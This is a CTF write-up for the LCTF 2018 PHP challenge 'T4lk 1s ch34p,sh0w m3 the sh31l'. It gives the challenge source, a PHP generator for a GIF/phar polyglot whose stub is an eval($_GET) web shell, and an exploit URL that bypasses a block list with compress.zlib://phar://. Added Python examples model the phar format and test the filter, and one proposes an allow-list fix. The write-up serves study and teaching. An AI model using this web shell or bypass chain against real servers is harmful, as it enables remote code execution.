LCTF write-up: quick reproduction


    1、T4lk 1s ch34p,sh0w m3 the sh31l

    The challenge source is as follows:

    <?php
    
    $SECRET  = `../read_secret`;                                  
    $SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);
    $FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);   
    mkdir($SANDBOX);
    mkdir($FILEBOX);
    echo "$FILEBOX";
    
    
    if (!isset($_COOKIE["session-data"])) {
        $data = serialize(new User($SANDBOX));
        $hmac = hash_hmac("md5", $data, $SECRET);
        setcookie("session-data", sprintf("%s-----%s", $data, $hmac));      
    }
    
    
    class User {
        public $avatar;
        function __construct($path) {
            $this->avatar = $path;                                          
        }
    }
    
    
    class K0rz3n_secret_flag {
        protected $file_path;
        function __destruct(){
            if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
                die("Sorry Sorry Sorry");
            }
        include_once($this->file_path);
     }
    }
    
    function check_session() {
        global $SECRET;
        $data = $_COOKIE["session-data"];
        list($data, $hmac) = explode("-----", $data, 2);
        if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){
            die("Bye");
        }
        if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){
            die("Bye Bye");
        }
        $data = unserialize($data);
    
        if ( !isset($data->avatar) ){
            die("Bye Bye Bye");
        }
        return $data->avatar; // returns the upload path (the per-IP sandbox directory)
    }
    
    
    function upload($path) {
        if(isset($_GET['url'])){
             if(preg_match('/^(http|https).*/i', $_GET['url'])){
                $data = file_get_contents($_GET["url"] . "/avatar.gif");                                                                                     
                if (substr($data, 0, 6) !== "GIF89a"){
                    die("Fuck off");
                }
                //?m=upload&url=http://vps/avatar.gif
                file_put_contents($path . "/avatar.gif", $data);
                die("Upload OK");
            }else{
                die("Hacker");
            }           
        }else{
            die("Miss the URL~~");
        }
    }
    
    
    function show($path) {
        if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) {
    
            $path = "/var/www";
        }
        header("Content-Type: image/gif");
        die(file_get_contents($path . "/avatar.gif"));                     
    }
    
    
    
    function check($path){
        if(isset($_GET['c'])){
            if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\s)*|(.|\s)*(file)(.|\s)*/i',$_GET['c'])){
                die("Hacker Hacker Hacker");
            }else{
                $file_path = $_GET['c'];
                list($width, $height, $type) = @getimagesize($file_path);
                die("Width is :" . $width." px<br>" .
                    "Height is :" . $height." px<br>");
            }
        }else{
            list($width, $height, $type) = @getimagesize($path."/avatar.gif");
            die("Width is :" . $width." px<br>" .
                "Height is :" . $height." px<br>");
        }
    }
    
    
    function move($source_path,$dest_name){
        global $FILEBOX;
        $dest_path = $FILEBOX . "/" . $dest_name;
        if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|..|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){
            die("Hacker Hacker Hacker");
        }else{
            if(copy($source_path,$dest_path)){
                die("Successful copy");
            }else{
                die("Copy failed");
            }
        }
    }
    
    
    
    
    $mode = $_GET["m"];
    
    if ($mode == "upload"){
         upload(check_session());
    }
    else if ($mode == "show"){
        show(check_session());
    }
    else if ($mode == "check"){
        check(check_session());
    }
    else if($mode == "move"){
        move($_GET['source'],$_GET['dest']);
    }
    else{
    
        highlight_file(__FILE__);    
    }

    1. Upload the malicious file; it gets included when the deserialization fires. The generated avatar.gif does double duty: its phar metadata carries a serialized K0rz3n_secret_flag whose $file_path points back at the uploaded avatar.gif itself (the sandbox path is known because the server hands it to the client inside the signed session-data cookie), and setStub() places PHP code at the front of the same file, so the include_once() in __destruct() executes it. The stub starts with GIF89a, which is exactly what the magic-byte check in upload() looks for.

    ?m=upload&url=http://vps/avatar.gif

    <?php
    // Run with phar.readonly disabled, e.g. php -d phar.readonly=0 gen.php
    class K0rz3n_secret_flag {
        // Same class layout as on the target, so the metadata unserializes into the real class there.
        protected $file_path='/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif';
        function __destruct(){
            if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
                die("Sorry Sorry Sorry");
            }
        include_once($this->file_path);
        }
     }
    
    $a= new K0rz3n_secret_flag();
    $p = new Phar('./1.phar', 0);          // the name must end in .phar while the archive is being written
    $p->startBuffering();
    // Stub: GIF89a magic for the upload check, the web shell, then the __HALT_COMPILER(); marker that ends the stub
    $p->setStub('GIF89a<?php echo 1;eval($_GET["a"]);?'.'><?php __HALT_COMPILER(); ?'.'>');
    $p->setMetadata($a);                   // the serialized object goes into the phar manifest
    $p->addFromString('1.txt','text');     // one file entry; its content does not matter
    $p->stopBuffering();
    rename('./1.phar', 'avatar.gif');      // rename so it is fetched and stored as avatar.gif

    The generated malicious file (the original post shows it as an image, not reproduced here).
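The structure of the file the generator above writes, as an added Python example that is not part of the original write-up: it models the phar byte layout (following the PHP manual's phar file format, with the API-version, flag and signature constants the Phar extension uses), builds an avatar.gif of the same shape from the page's stub, serialized object and sandbox path, and parses it back to show where the GIF89a magic, the web shell and the serialized object end up. The stub text, class name, path and file name come from the page; the mtime of 0 and the 0644 entry flags are the example's own choices.

```python
"""Python model of the phar layout the PHP generator produces (added example;
PHP's Phar class does this for real)."""
import hashlib
import struct
import zlib

# For setStub('GIF89a<?php ...?><?php __HALT_COMPILER(); ?>') PHP keeps the
# stub up to __HALT_COMPILER(); and appends " ?>\r\n".
STUB = b'GIF89a<?php echo 1;eval($_GET["a"]);?><?php __HALT_COMPILER(); ?>\r\n'
# Sandbox path used in the page's payload (md5 of the secret and the player's IP).
TARGET = "/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif"


def serialize_flag_object(file_path: str) -> bytes:
    """serialize(new K0rz3n_secret_flag) as PHP emits it: the protected
    property is stored under the name "\\0*\\0file_path" (null bytes around *)."""
    prop = b"\x00*\x00file_path"
    path = file_path.encode()
    return (b'O:18:"K0rz3n_secret_flag":1:{s:%d:"%s";s:%d:"%s";}'
            % (len(prop), prop, len(path), path))


def build_phar(stub: bytes, metadata: bytes, files: dict) -> bytes:
    """stub | manifest | file contents | signature, all integers little-endian."""
    entries, contents = b"", b""
    for name, data in files.items():
        nb = name.encode()
        # name len, name, size, mtime, compressed size, crc32, flags (perm 0644), meta len
        entries += struct.pack("<I", len(nb)) + nb + struct.pack(
            "<IIIIII", len(data), 0, len(data), zlib.crc32(data) & 0xFFFFFFFF, 0o644, 0)
        contents += data
    manifest = (struct.pack("<IHII", len(files), 0x1110, 0x00010000, 0)  # count, API 1.1.1, HAS_SIGNATURE, alias len
                + struct.pack("<I", len(metadata)) + metadata           # this is what gets unserialize()d
                + entries)
    body = stub + struct.pack("<I", len(manifest)) + manifest + contents
    # SHA1 over everything before it, then signature flag 0x0002 and the "GBMB" trailer.
    return body + hashlib.sha1(body).digest() + struct.pack("<I", 2) + b"GBMB"


def parse_phar(blob: bytes) -> dict:
    """Find the manifest behind __HALT_COMPILER(); and pull out the parts that
    matter for the exploit: stub bytes, metadata, file names, signature."""
    pos = blob.index(b"__HALT_COMPILER();") + len(b"__HALT_COMPILER();")
    if blob[pos:pos + 3] == b" ?>":          # the loader tolerates ' ?>' then CRLF or LF
        pos += 3
    if blob[pos:pos + 2] == b"\r\n":
        pos += 2
    elif blob[pos:pos + 1] == b"\n":
        pos += 1
    stub = blob[:pos]
    mlen, = struct.unpack_from("<I", blob, pos)
    m = blob[pos + 4:pos + 4 + mlen]
    nfiles, api, flags, alias_len = struct.unpack_from("<IHII", m, 0)
    off = 14 + alias_len
    meta_len, = struct.unpack_from("<I", m, off)
    metadata = m[off + 4:off + 4 + meta_len]
    off += 4 + meta_len
    names = []
    for _ in range(nfiles):
        nlen, = struct.unpack_from("<I", m, off)
        names.append(m[off + 4:off + 4 + nlen].decode())
        fmeta_len, = struct.unpack_from("<I", m, off + 4 + nlen + 20)
        off += 4 + nlen + 24 + fmeta_len
    sig_flag, = struct.unpack_from("<I", blob, len(blob) - 8)
    sig_ok = (blob.endswith(b"GBMB") and sig_flag == 2
              and hashlib.sha1(blob[:-28]).digest() == blob[-28:-8])
    return {"stub": stub, "gif_magic_ok": blob[:6] == b"GIF89a",
            "metadata": metadata, "files": names,
            "has_signature": bool(flags & 0x00010000), "sig_ok": sig_ok}


def build_and_parse() -> dict:
    """Build the equivalent of the page's avatar.gif and parse it back."""
    return parse_phar(build_phar(STUB, serialize_flag_object(TARGET), {"1.txt": b"text"}))


if __name__ == "__main__":
    for key, value in build_and_parse().items():
        print(f"{key}: {value!r}")
```

The first six bytes are the stub's GIF89a, so upload() accepts the file, while the serialized object sits in the manifest right after the stub; any filesystem function that opens the file through the phar:// wrapper, getimagesize() included, parses this manifest and unserializes that metadata.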

    2. Trigger the deserialization through check. The regex is bypassed with compress.zlib://phar://: the block list on $_GET['c'] only anchors the banned wrapper names at the start of the string (and bans "file" anywhere), so a value starting with compress.zlib:// is not matched, while PHP still resolves the inner phar:// wrapper and unserializes the phar metadata when getimagesize() opens the file. The request below also passes a=phpinfo(), which the stub's eval() runs once the destructor includes avatar.gif. Reference: https://blog.zsxsoft.com/post/38

     http://212.64.7.171/LCTF.php?m=check&c=compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif&a=phpinfo();
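Why the filter falls for this, as an added example that is not part of the original write-up: the three preg_match() patterns from the challenge source ported to Python's re (the syntax is the same), run over candidate values for $_GET['c'] including the page's own payload, next to an allow-list replacement for check(). The sandbox path is the one from the request above; hardened_resolve, SAFE_NAME and the payload names are the example's own.

```python
"""Block-list filters from the challenge, ported to Python, beside an allow-list fix."""
import posixpath
import re

# preg_match() patterns copied from the challenge source.
CHECK_FILTER = re.compile(
    r'^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\s)*|(.|\s)*(file)(.|\s)*',
    re.I)
DESTRUCT_FILTER = re.compile(r'(log|etc|session|proc|read_secret|history|class)', re.I)
# Note the unescaped '..' in move(): it matches any two characters, so every
# source path of two or more characters is rejected and move() never copies.
MOVE_FILTER = re.compile(
    r'(log|etc|session|proc|root|secret|www|history|file|..|ftp|php|phar|zlib'
    r'|data|glob|ssh2|rar|ogg|expect|http|https)', re.I)

SANDBOX = "/var/www/data/dccb75e38fe3fc2c70fd169f263e6d37"  # from the page's request


def check_blocks(c: str) -> bool:
    """True when check() would die('Hacker Hacker Hacker') for this value of c."""
    return CHECK_FILTER.search(c) is not None


def destruct_blocks(path: str) -> bool:
    """True when K0rz3n_secret_flag::__destruct() refuses to include path."""
    return DESTRUCT_FILTER.search(path) is not None


def move_blocks(src: str) -> bool:
    """True when move() rejects the source path."""
    return MOVE_FILTER.search(src) is not None


SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]{1,64}\.gif$')


def hardened_resolve(c: str, sandbox: str):
    """Allow-list replacement for check(): accept a bare .gif file name, so no
    scheme (phar://, compress.zlib://, data:) and no directory part can reach
    getimagesize(), and confine the result to the caller's own sandbox.
    posixpath.normpath stands in for PHP's realpath() so this runs without files."""
    if not SAFE_NAME.match(c):
        return None
    root = sandbox.rstrip("/")
    path = posixpath.normpath(posixpath.join(root, c))
    return path if path.startswith(root + "/") else None


PAYLOADS = {  # constructed candidate values for c
    "plain":  SANDBOX + "/avatar.gif",
    "phar":   "phar://" + SANDBOX + "/avatar.gif",
    "filter": "php://filter/resource=" + SANDBOX + "/avatar.gif",
    "zlib":   "compress.zlib://phar://" + SANDBOX + "/avatar.gif",
}


def bypass_table() -> dict:
    """Which payloads check()'s block list stops (False = gets through)."""
    return {name: check_blocks(p) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, blocked in bypass_table().items():
        print(f"{name:7s} blocked={blocked}")
    # the $file_path inside the metadata must also pass the destructor's own filter
    print("destructor blocks sandbox path:", destruct_blocks(PAYLOADS["plain"]))
    print("hardened:", hardened_resolve("avatar.gif", SANDBOX),
          hardened_resolve(PAYLOADS["zlib"], SANDBOX))
```

The block list stops phar:// and php:// but not compress.zlib://phar://, because only the outer wrapper name is inspected; the allow-list version never lets a wrapper name through at all, which is the fix a practitioner would ship (with realpath() on the joined path in real PHP).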

    2、bestphp's revenge

    Deserialize a SoapClient object and use it for SSRF. For details see: https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

    References:

    https://xz.aliyun.com/t/3341#toc-8

    https://xz.aliyun.com/t/3339#toc-4

    https://xz.aliyun.com/t/3340#toc-3

    http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

    Original post: https://www.cnblogs.com/afanti/p/9987094.html